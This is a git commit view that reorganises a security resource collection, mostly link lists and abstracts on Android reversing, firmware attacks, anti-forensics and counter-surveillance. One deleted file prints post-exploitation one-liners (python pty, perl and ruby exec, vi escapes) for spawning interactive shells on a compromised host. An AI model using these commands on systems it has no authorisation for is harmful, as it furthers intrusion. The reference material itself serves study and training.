Browse Source

Lot of cleanup/re-arrangement/adding of stuff

pull/4/head
Robert 7 years ago
parent
commit
7e973f822b
55 changed files with 973 additions and 955 deletions
  1. +41
    -82
      Draft/Draft/Anonymity Opsec Privacy -.md
  2. +13
    -0
      Draft/Draft/Anti-Forensics.md
  3. +0
    -44
      Draft/Draft/AppSec.md
  4. +70
    -73
      Draft/Draft/Attacking Defending Android -.md
  5. +19
    -49
      Draft/Draft/BIOS UEFI Attacks Defenses.md
  6. +4
    -9
      Draft/Draft/Basic Security Information.md
  7. +0
    -42
      Draft/Draft/CLI Tricks Spawn Shells.md
  8. +16
    -17
      Draft/Draft/CTFs & Wargames -.md
  9. +38
    -22
      Draft/Draft/Cheat sheets reference pages Checklists -.md
  10. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt
  11. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
  12. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt
  13. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
  14. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt
  15. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
  16. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
  17. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt
  18. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
  19. +0
    -0
      Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
  20. +0
    -20
      Draft/Draft/Common CLI CMD Refs.md
  21. +0
    -0
      Draft/Draft/Con Videos Stuff -.md
  22. +24
    -23
      Draft/Draft/Counter Surveillance.md
  23. +65
    -9
      Draft/Draft/Courses & Training -.md
  24. +44
    -8
      Draft/Draft/Darknets -.md
  25. +82
    -0
      Draft/Draft/Data AnalysisVisualization.md
  26. +0
    -23
      Draft/Draft/Data Visualization.md
  27. +154
    -95
      Draft/Draft/Embedded Device & Hardware Hacking -.md
  28. +9
    -0
      Draft/Draft/Exfiltration.md
  29. +6
    -1
      Draft/Draft/Exploit Development.md
  30. +5
    -1
      Draft/Draft/Forensics Incident Response/add cull.txt
  31. +4
    -0
      Draft/Draft/Fuzzing Bug Hunting.md
  32. +3
    -0
      Draft/Draft/Honeypots -.md
  33. +31
    -5
      Draft/Draft/Lockpicking -.md
  34. +20
    -0
      Draft/Draft/Logging - Combine with NSM.md
  35. +5
    -0
      Draft/Draft/Malware.md
  36. +34
    -21
      Draft/Draft/Programming - Languages Libs Courses References.md
  37. +31
    -1
      Draft/Draft/Reverse Engineering.md
  38. +9
    -0
      Draft/Draft/Rootkits.md
  39. +1
    -1
      Draft/Draft/System Internals Windows and Linux Internals Reference.md
  40. +17
    -2
      Draft/Draft/To Do/add cull -1.txt
  41. +176
    -81
      Draft/Draft/Web & Browsers.md
  42. +0
    -36
      Draft/Draft/Web Applications/Add.txt
  43. +0
    -79
      Draft/Draft/Web Applications/Cull integrate.txt
  44. +0
    -36
      Draft/Draft/Web Applications/Databases.txt
  45. +0
    -22
      Draft/Draft/Web Applications/General Tips Trick.txt
  46. +0
    -30
      Draft/Draft/Web Applications/Securing Web Applications.txt
  47. +0
    -28
      Draft/Draft/Web Applications/Tools/Brute Force Tools.txt
  48. +0
    -6
      Draft/Draft/Web Applications/Tools/JS PHP Decoders Unobfuscators.txt
  49. +0
    -13
      Draft/Draft/Web Applications/Tools/Meta.txt
  50. +0
    -0
      Draft/Draft/Web Applications/Tools/SQL Injection.rtf
  51. +0
    -21
      Draft/Draft/Web Applications/Tools/Scanners.txt
  52. +0
    -0
      Draft/Draft/Web Applications/Tools/Tools.rtf
  53. +0
    -22
      Draft/Draft/Web Applications/Tools/WebShells.txt
  54. +0
    -0
      Draft/Draft/Web Applications/Web Applications.rtf
  55. +52
    -33
      Draft/Draft/Wireless Networks & RF.md

Draft/Draft/Anonymity Opsec Privacy.md → Draft/Draft/Anonymity Opsec Privacy -.md View File


+ 13
- 0
Draft/Draft/Anti-Forensics.md View File

@ -1,12 +1,25 @@
##Anti-Forenics
[Hiding Data in Hard-Drive's Service Areas](http://recover.co.il/SA-cover/SA-cover.pdf)
* In this paper we will demonstrate how spinning hard-drives’ serv ice areas 1 can be used to hide data from the operating-system (or any software using the standard OS’s API or the standard ATA commands to access the hard- drive)
[Anti-Forensics and Anti-Anti-Forensics Attacks - Michael Perkins](https://www.youtube.com/watch?v=J4x8Hz6_hq0)
* Everyone's heard the claim: Security through obscurity is no security at all. Challenging this claim is the entire field of steganography itself - the art of hiding things in plain sight. Most people know you can hide a text file inside a photograph, or embed a photograph inside an MP3. But how does this work under the hood? What's new in the stego field? This talk will explore how various techniques employed by older steganographic tools work and will discuss a new technique developed by the speaker which embodies both data hiding and data enciphering properties by encoding data inside NTFS volumes. A new tool will be released during this talk that will allow attendees to both encode and decode data with this new scheme.
* [Slides](http://www.slideshare.net/the_netlocksmith/defcon-20-antiforensics-and-antiantiforensics)
[Beyond The CPU:Defeating Hardware Based RAM Acquisition](https://www.blackhat.com/presentations/bh-dc-07/Rutkowska/Presentation/bh-dc-07-Rutkowska-up.pdf)


+ 0
- 44
Draft/Draft/AppSec.md View File

@ -1,44 +0,0 @@
##AppSec
idk
https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet
https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet
Secure Coding Practices
SDLC
Code Review
[Bindead - static binary binary analysis tool](https://bitbucket.org/mihaila/bindead/wiki/Home)
* Bindead is an analyzer for executable machine code. It features a disassembler that translates machine code bits into an assembler like language (RREIL) that in turn is then analyzed by the static analysis component using abstract interpretation.
[Applied Appsec](http://www.thotcon.org/archive/0x2presos/10-AppliedApplicationSecurity.pdf)
[Statically Linked Library Detector](https://github.com/arvinddoraiswamy/slid)
[BitBlaze](http://bitblaze.cs.berkeley.edu/)
* The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to (1) analyze and develop novel COTS protection and diagnostic mechanisms and (2) analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation.

+ 70
- 73
Draft/Draft/Attacking Defending Android -.md View File

@ -4,20 +4,35 @@ Attacking Android Devices
TOC
Cull
Intro
Android Internals
Vulnerabilities
Exploits
Device Analysis
Application Analysis
* Dynamic Analysis
* Static Analysis
* Online APK Analyzers
Attack Platforms
Android Malware
Reverse Engineering Android
Interesting Papers
Write-ups
Books
Other
[Hacking Your Way Up The Mobile Stack](http://vimeo.com/51270090)
[Secure Coding Standards - Android](https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=111509535)
[csploit](http://www.csploit.org/docs.html)
* The most complete and advanced IT security professional toolkit on Android.(From their site)
* [Github](https://github.com/cSploit/android/tree/master/cSploit)
###Cull
[elsim - Elements Similarities](https://code.google.com/p/elsim/wiki/Similarity#Diffing_of_applications)
* Similarities/Differences of applications (aka rip-off indicator)
@ -25,57 +40,36 @@ Intro
[ARE - Virtual Machine for Android Reverse Engineering](https://redmine.honeynet.org/projects/are)
[APK Studio - Android Reverse Engineering](https://apkstudio.codeplex.com/)
* APK Studio is an IDE for decompiling/editing & then recompiling of android application binaries. Unlike initial release being Windows exclusive & also didn't support frameworks, this one is completely re-written using QT for cross-platform support. You can now have multiple frameworks installed & pick a particular one on a per project basis.
[Android Reverse Engineering Defenses](https://bluebox.com/wp-content/uploads/2013/05/AndroidREnDefenses201305.pdf)
[Android Bytecode Obfuscation - Patrick Schulz 2012](http://dexlabs.org/blog/bytecode-obfuscation)
[PatchDroid: Scalable Third-Party Security Patches for Android Devices](http://www.mulliner.org/collin/academic/publications/patchdroid.pdf)
* Android is currently the largest mobile platform with around 750 million devices worldwide. Unfortunately, more than 30% of all devices contain publicly known security vulnera- bilities and, in practice, cannot be updated through normal mechanisms since they are not longer supported by the man- ufacturer and mobile operator. This failure of traditional patch distribution systems has resulted in the creation of a large population of vulnerable mobile devices. In this paper, we present PatchDroid, a system to dis- tribute and apply third-party security patches for Android. Our system is designed for device-independent patch cre- ation, and uses in-memory patching techniques to address vulnerabilities in both native and managed code. We created a fully usable prototype of PatchDroid, including a number of patches for well-known vulnerabilities in Android devices. We evaluated our system on different devices from multiple manufacturers and show that we can effectively patch se- curity vulnerabilities on Android devices without impacting performance or usability. Therefore, PatchDroid represents a realistic path towards dramatically reducing the number of exploitable Android devices in the wild.
####Vulnerabilities
[List of Android Vulnerabilities](http://androidvulnerabilities.org/all)
####Exploits
[List of Android Exploits](https://github.com/droidsec/droidsec.github.io/wiki/Vuln-Exploit-List)
###Books
* Android hackers handbook
###Write-ups and Links
[ Inside the Android Play Service's magic OAuth flow ](http://sbktech.blogspot.com/2014/01/inside-android-play-services-magic.html)
* Owning google accounts on android devices
[APK Studio - Android Reverse Engineering](https://apkstudio.codeplex.com/)
* APK Studio is an IDE for decompiling/editing & then recompiling of android application binaries. Unlike initial release being Windows exclusive & also didn't support frameworks, this one is completely re-written using QT for cross-platform support. You can now have multiple frameworks installed & pick a particular one on a per project basis.
[Security enhancements in android through its versions](www.androidtamer.com)
[Understanding the Android bytecode](https://mariokmk.github.io/programming/2015/03/06/learning-android-bytecode.html)
* Writeup on reversing/understanding Android Bytecode
[Android Reverse Engineering Defenses](https://bluebox.com/wp-content/uploads/2013/05/AndroidREnDefenses201305.pdf)
[ClockLockingBeats](https://github.com/monk-dot/ClockLockingBeats)
* Repo for the DARPA CFT / Clock Locking Beats project. Exploring Android kernel and processor interactions to hide running threads
[PatchDroid: Scalable Third-Party Security Patches for Android Devices](http://www.mulliner.org/collin/academic/publications/patchdroid.pdf)
* Android is currently the largest mobile platform with around 750 million devices worldwide. Unfortunately, more than 30% of all devices contain publicly known security vulnera- bilities and, in practice, cannot be updated through normal mechanisms since they are not longer supported by the man- ufacturer and mobile operator. This failure of traditional patch distribution systems has resulted in the creation of a large population of vulnerable mobile devices. In this paper, we present PatchDroid, a system to dis- tribute and apply third-party security patches for Android. Our system is designed for device-independent patch cre- ation, and uses in-memory patching techniques to address vulnerabilities in both native and managed code. We created a fully usable prototype of PatchDroid, including a number of patches for well-known vulnerabilities in Android devices. We evaluated our system on different devices from multiple manufacturers and show that we can effectively patch se- curity vulnerabilities on Android devices without impacting performance or usability. Therefore, PatchDroid represents a realistic path towards dramatically reducing the number of exploitable Android devices in the wild.
###Android Malware
[Rundown of Android Packers](http://www.fortiguard.com/uploads/general/Area41Public.pdf)
###Android Internals
[Dalvik opcodes](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
[APK File Infection on an Android System](https://www.youtube.com/watch?v=HZI1hCdqKjQ&list=PLCDA5DF85AD6B4ABD)
[Dalvik Bytecode Format docs](http://source.android.com/devices/tech/dalvik/dex-format.html)
[Manifesto](https://github.com/maldroid/manifesto)
* PoC framework for APK obfuscation, used to demonstrate some of the obfuscation examples from http://maldr0id.blogspot.com. It supports plugins (located in processing directory) that can do different obfuscation techniques. Main gist is that you run manifesto on the APK file and it produces an obfuscated APK file.
[Android Hacker Protection Level 0 - DEF CON 22 - Tim Strazzere and Jon Sawyer](https://www.youtube.com/watch?v=vLU92bNeIdI)
* Obfuscator here, packer there - the Android ecosystem is becoming a bit cramped with different protectors for developers to choose. With such limited resources online about attacking these protectors, what is a new reverse engineer to do? Have no fear, after drinking all the cheap wine two Android hackers have attacked all the protectors currently available for everyones enjoyment! Whether you've never reversed Android before or are a hardened veteran there will be something for you, along with all the glorious PoC tools and plugins for your little heart could ever desire.
####Vulnerabilities
[List of Android Vulnerabilities](http://androidvulnerabilities.org/all)
###Security Analysis
####Exploits
[List of Android Exploits](https://github.com/droidsec/droidsec.github.io/wiki/Vuln-Exploit-List)
###Device Analysis
@ -275,12 +269,32 @@ Check the Encryption section of the overall guide for more information.
###Android Internals
[Dalvik opcodes](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
###Android Malware
[Dalvik Bytecode Format docs](http://source.android.com/devices/tech/dalvik/dex-format.html)
[Rundown of Android Packers](http://www.fortiguard.com/uploads/general/Area41Public.pdf)
[APK File Infection on an Android System](https://www.youtube.com/watch?v=HZI1hCdqKjQ&list=PLCDA5DF85AD6B4ABD)
[Manifesto](https://github.com/maldroid/manifesto)
* PoC framework for APK obfuscation, used to demonstrate some of the obfuscation examples from http://maldr0id.blogspot.com. It supports plugins (located in processing directory) that can do different obfuscation techniques. Main gist is that you run manifesto on the APK file and it produces an obfuscated APK file.
[Android Hacker Protection Level 0 - DEF CON 22 - Tim Strazzere and Jon Sawyer](https://www.youtube.com/watch?v=vLU92bNeIdI)
* Obfuscator here, packer there - the Android ecosystem is becoming a bit cramped with different protectors for developers to choose. With such limited resources online about attacking these protectors, what is a new reverse engineer to do? Have no fear, after drinking all the cheap wine two Android hackers have attacked all the protectors currently available for everyones enjoyment! Whether you've never reversed Android before or are a hardened veteran there will be something for you, along with all the glorious PoC tools and plugins for your little heart could ever desire.
###Reverse Engineering Android
[Android apk-tool](https://code.google.com/p/android-apktool/)
* It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.
[Reversing and Auditing Android’s Proprietary bits](http://www.slideshare.net/joshjdrake/reversing-and-auditing-androids-proprietary-bits)
[Smali](https://code.google.com/p/smali/)
* smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)
[Dexter](http://dexter.dexlabs.org/accounts/login/?next=/dashboard)
* Dexter is a static android application analysis tool
[APKinpsector](https://github.com/honeynet/apkinspector/)
APKinspector is a powerful GUI tool for analysts to analyze the Android applications.
[Reversing Android Apps Slides](http://www.floyd.ch/download/Android_0sec.pdf)
@ -370,46 +384,29 @@ The project currently includes two applications: FourGoats, a location-based soc
[Insecure Bank v2](https://github.com/dineshshetty/Android-InsecureBankv2)
* This vulnerable Android application is named "InsecureBankv2" and is made for security enthusiasts and developers to learn the Android insecurities by testing this vulnerable application. Its back-end server component is written in python. The client component i.e. the Android InsecureBank.apk can be downloaded along with the source code.
The list of vulnerabilities that are currently included in this release are:
Insecure Logging mechanism
Vulnerable Activity Components
Content providers injection
Weak Broadcast Receiver permissions
Android Pasteboard vulnerability
Local Encryption issues
Android keyboard cache issues
Insecure Webview implementation
Insecure SDCard storage
Insecure HTTP connections
Weak Authorization mechanism
Parameter Manipulation
Weak Cryptography implementation
Hardcoded secrets
Username Enumeration issue
Developer Backdoors
Weak change password implementation
Weak Local storage issues
https://github.com/dineshshetty/Android-InsecureBankv2
###Reverse Engineering Android
[Android apk-tool](https://code.google.com/p/android-apktool/)
* It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.
[Reversing and Auditing Android’s Proprietary bits](http://www.slideshare.net/joshjdrake/reversing-and-auditing-androids-proprietary-bits)
[Smali](https://code.google.com/p/smali/)
* smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)
###Write-ups
[Dexter](http://dexter.dexlabs.org/accounts/login/?next=/dashboard)
* Dexter is a static android application analysis tool.
[ Inside the Android Play Service's magic OAuth flow ](http://sbktech.blogspot.com/2014/01/inside-android-play-services-magic.html)
* Owning google accounts on android devices
[APKinpsector](https://github.com/honeynet/apkinspector/)
APKinspector is a powerful GUI tool for analysts to analyze the Android applications.
[Security enhancements in android through its versions](www.androidtamer.com)
[Reversing Android Apps Slides](http://www.floyd.ch/download/Android_0sec.pdf)
[Understanding the Android bytecode](https://mariokmk.github.io/programming/2015/03/06/learning-android-bytecode.html)
* Writeup on reversing/understanding Android Bytecode
[ClockLockingBeats](https://github.com/monk-dot/ClockLockingBeats)
* Repo for the DARPA CFT / Clock Locking Beats project. Exploring Android kernel and processor interactions to hide running threads
###Books
* Android Hackers Handbook
* Android System Security Internals
###Other


+ 19
- 49
Draft/Draft/BIOS UEFI Attacks Defenses.md View File

@ -14,6 +14,24 @@ Writeups
###Cull
[Understanding AMT, UEFI BIOS and Secure boot relationships](https://communities.intel.com/community/itpeernetwork/vproexpert/blog/2013/08/11/understanding-amt-uefi-bios-and-secure-boot-relationships)
[Debug Agent Based UEFI Debugging](https://software.intel.com/en-us/articles/xdb-agent-based-uefi-debug)
* The Intel® System Debugger now supports non-JTAG based debug of UEFI BIOS, this requires the use of a target-side debug agent and a USB or serial connection to the debug agent. This article takes you through the steps necessary and the the debug methodology used bey the Intel® System Debugger to use this method to supplement the pure JTAG based UEFI debug method it also supports
[Official UEFI Site - Specs](http://www.uefi.org/specsandtesttools)
[UEFI - OSDev Wiki](http://wiki.osdev.org/UEFI)
[Easily create UEFI applications using Visual Studio 2013 ](http://pete.akeo.ie/2015/01/easily-create-uefi-applications-using.html)
[Extensible Firmware Interface (EFI) and Unified EFI (UEFI)](http://www.intel.com/content/www/us/en/architecture-and-technology/unified-extensible-firmware-interface/efi-homepage-general-technology.html)
[Windows UEFI startup – A technical overview](http://news.saferbytes.it/analisi/2013/10/windows-uefi-startup-a-technical-overview/)
* Through this analysis paper we’ll give a look at Windows 8 (and 8.1) UEFI startup mechanisms and we’ll try to understand their relationship with the underlying hardware platform.
http://www.legbacore.com/Research.html
@ -118,8 +136,7 @@ Grab links for his papers
[Implementation and Implications of a Stealth Hard-Drive Backdoor](https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf)
* Modern workstations and servers implicitly trust hard disks to act as well-behaved block devices. This paper analyzes the catastrophic loss of security that occurs when hard disks are not trustworthy. First, we show that it is possible to compromise the firmware of a commercial o -the-shelf hard drive, by resorting only to public information and reverse engineering. Using such a compromised firmware, we present a stealth rootkit that replaces arbitrary blocks from the disk while they are written, providing a data replacement back- door . The measured performance overhead of the compromised disk drive is less than 1% compared with a normal, non-malicious disk drive. We then demonstrate that a re- mote attacker can even establish a communication channel with a compromised disk to infiltrate commands and to ex-filtrate data. In our example, this channel is established over the Internet to an unmodified web server that relies on the compromised drive for its storage, passing through the original webserver, database server, database storage engine, filesystem driver, and block device driver. Additional experiments, performed in an emulated disk-drive environment, could automatically extract sensitive data such as /etc/shadow (or a secret key le) in less than a minute. This paper claims that the diffculty of implementing such an at- tack is not limited to the area of government cyber-warfare; rather, it is well within the reach of moderately funded criminals, botnet herders and academic researchers.
[Attackin the TPM part 2](https://www.youtube.com/watch?v=h-hohCfo4LA)
@ -127,52 +144,5 @@ Grab links for his papers
###Tools:
[Psychson](https://github.com/adamcaudill/Psychson)
Phison 2251-03 (2303) Custom Firmware & Existing Firmware Patches (BadUSB)
###Defending Against Hardware Attacks
[Anti-Evil Maid](http://theinvisiblethings.blogspot.com/2011/09/anti-evil-maid.html?m=1)
###USB
[USB in a Nutshell](http://www.beyondlogic.org/usbnutshell/usb1.shtml)
* Great explanation of the USB standard in depth
[Psychson](https://github.com/adamcaudill/Psychson)
[USB Device Drivers: A Stepping Stone into your Kernel](https://www.youtube.com/watch?v=HQWFHskIY2)
* [Slides])(www.jodeit.org/research/DeepSec2009_USB_Device_Drivers.pdf)
[Lowering the USB Fuzzing Barrier by Transparent Two-Way Emulation](https://www.usenix.org/system/files/conference/woot14/woot14-vantonder.pdf)
* Abstract: Increased focus on the Universal Serial Bus (USB) attack surface of devices has recently resulted in a number of new vulnerabilities. Much of this advance has been aided by the advent of hardware-based USB emulation techniques. However, existing tools and methods are far from ideal, requiring a significant investment of time, money, and effort. In this work, we present a USB testing framework that improves significantly over existing methods in providing a cost-effective and flexible way to read and modify USB communication. Amongst other benefits, the framework enables man-in-the-middle fuzz testing between a host and peripheral. We achieve this by performing two-way emulation using inexpensive bespoke USB testing hardware, thereby delivering capa-bilities of a USB analyzer at a tenth of the cost. Mutational fuzzing is applied during live communication between a host and peripheral, yielding new security-relevant bugs. Lastly, we comment on the potential of the framework to improve current exploitation techniques on the USB channel.
###SD Cards
[The Exploration and Exploitation of an SD Memory Card](https://www.youtube.com/watch?v=Tj-zI8Tl218)
* This talk demonstrates a method for reverse engineering and loading code into the microcontroller within a SD memory card.
###Computer Hardware Attack Writeups
[Perimeter-Crossing Buses: a New Attack Surface for
Embedded Systems](http://www.cs.dartmouth.edu/~sws/pubs/bgjss12.pdf)
* Abstract: This paper maps out the bus-facing attack surface of a modern operating system, and demonstrates that e ective and ecient injection of trac into the buses is real and easily a ordable. Further, it presents a simple and inexpen-sive hardware tool for the job, outlining the architectural and computation-theoretic challenges to creating a defensive OS/driver architecture comparable to that which has been achieved for network stacks.
[Breaking apple touchID cheaply](http://www.ccc.de/en/updates/2013/ccc-breaks-apple-touchid)
[Keykeriki v2.0](http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html)
* Hardware to attack wireless keyboards and other such things
[Stealthy Dopant-Level Hardware Trojans](Hardware level trojans http://sharps.org/wp-content/uploads/BECKER-CHES.pdf)
* Abstract: In this paper we propose an extremely stealthy approach for implement- ing hardware Trojans below the gate level, and we evaluate their impact on the security of the target device. Instead of adding additional cir- cuitry to the target design, we insert our hardware Trojans by changing the dopant polarity of existing transistors. Since the modi ed circuit ap- pears legitimate on all wiring layers (including all metal and polysilicon), our family of Trojans is resistant to most detection techniques, includ- ing ne-grain optical inspection and checking against \golden chips". We demonstrate the e ectiveness of our approach by inserting Trojans into two designs | a digital post-processing derived from Intel's cryp- tographically secure RNG design used in the Ivy Bridge processors and a side-channel resistant SBox implementation | and by exploring their detectability and their e ects on security.

+ 4
- 9
Draft/Draft/Basic Security Information.md View File

@ -1,21 +1,12 @@
##Basic Security Principles/Information
Shodan Guide
[Shodan Man page](http://www.shodanhq.com/help)
[Shodan Filter Reference](http://www.shodanhq.com/help/filters)
[Shodan FAQ](http://www.shodanhq.com/help/faq)
[Types of Authentication](http://www.gfi.com/blog/security-101-authentication-part-2/)
[Information Security For Journalist book - Centre for Investigative Journalism](http://files.gendo.nl/Books/InfoSec_for_Journalists_V1.1.pdf)
[Access control best practices](https://srlabs.de/acs/)
@ -36,4 +27,8 @@ Shodan Guide
Shodan Guide
[Shodan Man page](http://www.shodanhq.com/help)
[Shodan Filter Reference](http://www.shodanhq.com/help/filters)
[Shodan FAQ](http://www.shodanhq.com/help/faq)

+ 0
- 42
Draft/Draft/CLI Tricks Spawn Shells.md View File

@ -1,42 +0,0 @@
Using TCP dump to dump traffic to a pcap file for inspection later:
tcpdump -i <interface> -s 65535 -w <some-file>
Spawning Shells
Sometimes when you pop a box, you’re left with something other than a full TTY shell. These commands can help you spawn one.
Shell Spawning
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec (’bin/sh’)
(From within vi)
bash
(From within vi)
:set shell=/bin/bash:shell
(from within nmap)
(From http://netsec.ws/?p=337#more-337 )

Draft/Draft/CTFs & Wargames.md → Draft/Draft/CTFs & Wargames -.md View File


Draft/Draft/Cheat sheets reference pages Checklists.md → Draft/Draft/Cheat sheets reference pages Checklists -.md View File


Draft/Draft/Common CLI CMD Refs/Curl.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt View File


Draft/Draft/Common CLI CMD Refs/Metasploit.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt View File


Draft/Draft/Common CLI CMD Refs/Ncat.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt View File


Draft/Draft/Cheat sheets reference pages Checklists/Nmap Cheat Sheet.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt View File


Draft/Draft/Common CLI CMD Refs/Nmap.txt → Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt View File


Draft/Draft/Cheat sheets reference pages Checklists/SQLMap Cheat Sheet.txt → Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt View File


Draft/Draft/Common CLI CMD Refs/TCPDump.txt → Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt View File


Draft/Draft/Common CLI CMD Refs/ToDO.txt → Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt View File


Draft/Draft/Cheat sheets reference pages Checklists/WebApp Exploitation Cheat Sheet.txt → Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt View File


Draft/Draft/Cheat sheets reference pages Checklists/sqli cheat.txt → Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt View File


+ 0
- 20
Draft/Draft/Common CLI CMD Refs.md View File

@ -1,20 +0,0 @@
###Common CLI Commands Reference
TCPDump
Ncat
Nmap
Metasploit
Curl
Netsh
Wget
httpry
dsniff suite

Draft/Draft/Con Videos Stuff.md → Draft/Draft/Con Videos Stuff -.md View File


+ 24
- 23
Draft/Draft/Counter Surveillance.md View File

@ -5,10 +5,11 @@ I am not a professional and may be a twelve year old child. Be wary.
ToC
Cull
Guides/Write-ups
Papers
Videos
@ -19,43 +20,28 @@ I am not a professional and may be a twelve year old child. Be wary.
###Cull
[Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
###Guides/Write-ups
###Blogs/Sites
Detecting Surveillance - Spiderlabs blog
[1 Hardware Implants](http://blog.spiderlabs.com/2014/03/detecting-surveillance-state-surveillance-part-1-hardware-impants.html)
[2 Radio Frequency Exfiltration](http://blog.spiderlabs.com/2014/03/detecting-a-surveillance-state-part-2-radio-frequency-exfiltration.html)
[3 Infected Firmware](http://blog.spiderlabs.com/2014/04/detecting-a-surveillance-state-part-3-infected-firmware.html)
* [1 Hardware Implants](http://blog.spiderlabs.com/2014/03/detecting-surveillance-state-surveillance-part-1-hardware-impants.html)
* [2 Radio Frequency Exfiltration](http://blog.spiderlabs.com/2014/03/detecting-a-surveillance-state-part-2-radio-frequency-exfiltration.html)
* [3 Infected Firmware](http://blog.spiderlabs.com/2014/04/detecting-a-surveillance-state-part-3-infected-firmware.html)
[A Simple Guide to TSCM Sweeps](http://www.international-intelligence.co.uk/tscm-sweep-guide.html)
###Videos
[Dr. Philip Polstra - Am I Being Spied On?](https://www.youtube.com/watch?v=Bc7WoDXhcjM)
* Talk on cheap/free counter measures
[DNS May Be Hazardous to Your Health - Robert Stucke](https://www.youtube.com/watch?v=ZPbyDSvGasw)
* Great talk on attacking DNS
[CounterStrike Lawful Interception](https://www.youtube.com/watch?v=7HXLaRWk1SM)
* This short talk will cover the standards, devices and implementation of a mandatory part of our western Internet infrastructure. The central question is whether an overarching interception functionality might actually put national Internet infrastructure at a higher risk of being attacked successfully. The question is approached in this talk from a purely technical point of view, looking at how LI functionality is implemented by a major vendor and what issues arise from that implementation. Routers and other devices may get hurt in the process.
@ -69,6 +55,21 @@ Detecting Surveillance - Spiderlabs blog
[Exploiting Lawful Intercept to Wiretap the Internet](https://www.blackhat.com/presentations/bh-dc-10/Cross_Tom/BlackHat-DC-2010-Cross-Attacking-LawfulI-Intercept-wp.pdf)
* This paper will review Cisco's architecture for lawful intercept from asecurity perspective. We explain how a number of different weaknesses in its design coupled with publicly disclosed security vulnerabilities could enable a malicious person to access the interface and spy on communications without leaving a trace. We then provide a set of recommendations for the redesign of the interface as well as SNMP authentication in general to better mitigate the security risks.
S


Draft/Draft/Courses & Training.md → Draft/Draft/Courses & Training -.md View File


Draft/Draft/Darknets.md → Draft/Draft/Darknets -.md View File


+ 82
- 0
Draft/Draft/Data AnalysisVisualization.md View File

@ -0,0 +1,82 @@
##Data Visualization
ToC
Check out http://secviz.org/
http://sourceforge.net/projects/rapidminer/#
http://orange.biolab.si/
https://rapidminer.com/
http://ipython.org/
[*ORA](http://www.casos.cs.cmu.edu/projects/ora/)
